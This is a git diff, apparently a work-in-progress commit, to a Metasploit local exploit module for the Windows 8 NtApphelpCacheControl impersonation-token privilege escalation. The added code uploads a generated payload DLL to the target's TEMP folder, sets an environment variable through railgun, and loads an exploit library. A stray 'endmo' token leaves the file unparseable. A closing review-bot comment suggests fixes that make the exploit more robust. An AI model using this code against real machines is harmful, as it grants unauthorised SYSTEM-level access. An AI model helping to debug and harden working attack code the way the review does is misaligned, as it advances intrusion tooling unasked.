"Stash" it
parent
c60b6969bc
commit
0e6c7181b1
|
@ -5,15 +5,12 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -21,15 +18,17 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Name' => 'Windows NtApphelpCacheControl Token Impersonation',
|
||||
'Description' => %q{
|
||||
On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
|
||||
allows application compatibility data to be cached for quick reuse when new processes are created.
|
||||
A normal user can query the cache but cannot add new cached entries as the operation is restricted
|
||||
to administrators. This is checked in the function AhcVerifyAdminContext.
|
||||
allows application compatibility data to be cached for quick reuse when new processes are
|
||||
created. A normal user can query the cache but cannot add new cached entries as the
|
||||
operation is restricted to administrators. This is checked in the function
|
||||
AhcVerifyAdminContext.
|
||||
|
||||
This function has a vulnerability where it doesn't correctly check the impersonation token of the
|
||||
caller to determine if the user is an administrator. It reads the caller's impersonation token
|
||||
using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to
|
||||
LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an
|
||||
identify token on your thread from a local system process and bypass this check.
|
||||
This function has a vulnerability where it doesn't correctly check the impersonation token
|
||||
of the caller to determine if the user is an administrator. It reads the caller's
|
||||
impersonation token using PsReferenceImpersonationToken and then does a comparison between
|
||||
the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
|
||||
of the token so it's possible to get an identify token on your thread from a local system
|
||||
process and bypass this check.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -63,15 +62,62 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
}))
|
||||
end
|
||||
|
||||
def upload_payload_dll(payload_filepath)
|
||||
payload = generate_payload_dll({:dll_exitprocess => true})
|
||||
begin
|
||||
write_file(payload_filepath, payload)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
fail_with(
|
||||
Exploit::Exception::Unknown,
|
||||
"Error uploading file #{payload_filepath}: #{e.class} #{e}"
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
def set_filepath_env(payload_filepath)
|
||||
session.railgun.kernel32.SetEnvironmentVariableA("PAYLOAD_PATH", payload_filepath)
|
||||
if get_env("PAYLOAD_PATH") != payload_filepath
|
||||
fail_with(Exploit::Exception::Unknown, "Failed to set environment variable PAYLOAD_PATH")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
integrity = get_integrity_level
|
||||
case integrity
|
||||
when :low
|
||||
integrity = 0
|
||||
when :medium
|
||||
integrity = 1
|
||||
when :high
|
||||
integrity = 2
|
||||
when :system
|
||||
integrity = 3
|
||||
end
|
||||
|
||||
print_status("Your current integrity level is: #{integrity.to_s}")
|
||||
|
||||
if integrity > 1
|
||||
print_status("Your integrity level is high enough this exploit isn't suitable for you")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
temp = get_env('TEMP')
|
||||
if temp.blank?
|
||||
print_error("Unable to read TEMP")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Loading Exploit Library...")
|
||||
payload_filepath = "#{temp}\\msf_payload.dll"
|
||||
print_status("Uploading the Payload DLL to #{payload_filepath}...")
|
||||
upload_payload_dll(payload_filepath)
|
||||
if !file?(payload_filepath)
|
||||
print_error("Failed to save the payload DLL due to an unknown reason")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Loading Exploit Library...")
|
||||
session.core.load_library(
|
||||
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),
|
||||
'TargetFilePath' => temp + "\\ntapphelpcachecontrol.dll",
|
||||
|
@ -79,6 +125,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Extension' => false,
|
||||
'SaveToDisk' => false
|
||||
)
|
||||
end
|
||||
endmo
|
||||
|
||||
end
|
||||
|
|
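Review bot: The `case integrity` at the top of `exploit` in the third hunk has no `else` branch, so if `get_integrity_level` returns anything other than `:low`/`:medium`/`:high`/`:system` (nil, for instance) the variable keeps that value and the later `if integrity > 1` raises a comparison error instead of failing cleanly; add `else fail_with(Exploit::Exception::Unknown, "Unable to determine integrity level: #{integrity}")` before the `end` of the case. The status line `print_status("Loading Exploit Library...")` is printed twice, once before the payload upload and again before `load_library`, so the first should describe the upload or be dropped, and `#{integrity.to_s}` can simply be `#{integrity}`. `set_filepath_env` is defined but not called in any visible line; `exploit` continues past the end of this hunk, so the call may be there. In the final hunk `end` and `endmo` appear as the old/new pair; if `endmo` is on the new side the file no longer parses, which is worth confirming before this leaves the stash.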